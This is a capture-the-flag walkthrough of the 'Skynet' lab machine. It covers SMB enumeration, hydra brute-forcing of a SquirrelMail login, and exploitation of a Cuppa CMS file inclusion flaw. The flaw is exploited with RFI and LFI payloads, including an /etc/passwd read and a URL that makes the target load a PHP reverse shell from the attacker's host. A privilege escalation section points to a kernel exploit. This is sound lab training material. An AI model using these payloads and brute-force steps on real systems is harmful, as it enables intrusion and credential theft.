# Skynet ###### tags: `vulnerableMachine` `linuxMachine` [TOC] ## Recon   ### Smb service 445 (server message block) share the file over the network Script ``` nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.82.161 ``` Result ``` PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-users: | SKYNET\milesdyson (RID: 1000) | Full name: | Description: |_ Flags: Normal user account | smb-enum-shares: | account_used: guest | \\10.10.82.161\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (skynet server (Samba, Ubuntu)) | Users: 2 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.82.161\anonymous: | Type: STYPE_DISKTREE | Comment: Skynet Anonymous Share | Users: 0 | Max Users: <unlimited> | Path: C:\srv\samba | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.82.161\milesdyson: | Type: STYPE_DISKTREE | Comment: Miles Dyson Personal Share | Users: 0 | Max Users: <unlimited> | Path: C:\home\milesdyson\share | Anonymous access: <none> | Current user access: <none> | \\10.10.82.161\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> Nmap done: 1 IP address (1 host up) scanned in 73.31 seconds ``` Connect to SMB server ``` smbclient //10.10.82.161/anonymous ``` ``` get attention.txt get log1.txt ``` attention.txt ``` A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson ``` log1.txt password log ``` cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator ``` --- Enumerate web path ``` dirb http://10.10.82.161 ``` ``` ---- Scanning URL: http://10.10.82.161/ ---- ==> DIRECTORY: http://10.10.82.161/admin/ ==> DIRECTORY: http://10.10.82.161/config/ ==> DIRECTORY: http://10.10.82.161/css/ + http://10.10.82.161/index.html (CODE:200|SIZE:523) ==> DIRECTORY: http://10.10.82.161/js/ + http://10.10.82.161/server-status (CODE:403|SIZE:277) ==> DIRECTORY: http://10.10.82.161/squirrelmail/ ``` ## Initial Access  ``` POST /squirrelmail/src/redirect.php HTTP/1.1 Host: 10.10.82.161 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 75 Origin: http://10.10.82.161 Connection: close Referer: http://10.10.82.161/squirrelmail/src/login.php Cookie: squirrelmail_language=en_US; SQMSESSID=lbg6fj12qf3rk7ikenntmsokq7 Upgrade-Insecure-Requests: 1 login_username=meow&secretkey=meow&js_autodetect_results=1&just_logged_in=1 ``` login fail page  ``` Unknown user or password incorrect. ``` login (hydra) Generate potential Username https://github.com/soxoj/username-generation-guide ### Username Generate ``` python3 generate_by_real_info.py First name: Miles Last name: Dyson Year of birth: Username (optional): Zip code (optional): dyson dysonmiles milesdyson mdyson ``` ### Hydra ``` hydra -L username.txt -P password.txt 10.10.82.161 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." -o result ``` #### Result ``` # Hydra v9.4 run at 2023-01-31 17:32:55 on 10.10.82.161 http-post-form (hydra -L username.txt -P password.txt -o result 10.10.82.161 http-post-form /squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.) [80][http-post-form] host: 10.10.82.161 login: milesdyson password: cyborg007haloterminator ```  --- Password Reset maill  ``` Password:)s{A&2Z=F^n_E.B` ``` Download files /note ``` recurse NO prompt OFF mget * ``` important.txt  ---  ``` 1. Add features to beta CMS /45kra24zxs28v3yd ``` CMS (Content Management System) 用於管理、組織、存儲和發布網站上的內容。它允許不擅長網站開發的人員通過簡單的界面來管理網站的內容，而無需深入了解網站技術。常見的CMS包括：WordPress、Joomla、Drupal等。  ``` dirb http://10.10.82.161/45kra24zxs28v3yd/ ``` Result ``` ---- Scanning URL: http://10.10.82.161/45kra24zxs28v3yd/ ---- ==> DIRECTORY: http://10.10.82.161/45kra24zxs28v3yd/administrator/ ```  ### Search Public Exploit(cuppa) https://www.exploit-db.com/exploits/25971  web vulnerable - Remote file inclusion - Local file inclusion ``` <?php include($_REQUEST["urlConfig"]); ?> ``` Exploit ``` http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd ``` We could let Server include our reverse shell monkey reverse shell (php) https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php ``` python3 -m http.server ``` RCE (RFI) ``` http://10.10.82.161/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.17.11.72:8000/phpShell.php ```  ## privilege elevation check sudo  --- check SUID ``` find / -type f -perm -04000 -ls 2>/dev/null ```  ### Run linPEAS  Exploit linux kernel have vulnerable kernel version https://www.exploit-db.com/exploits/43418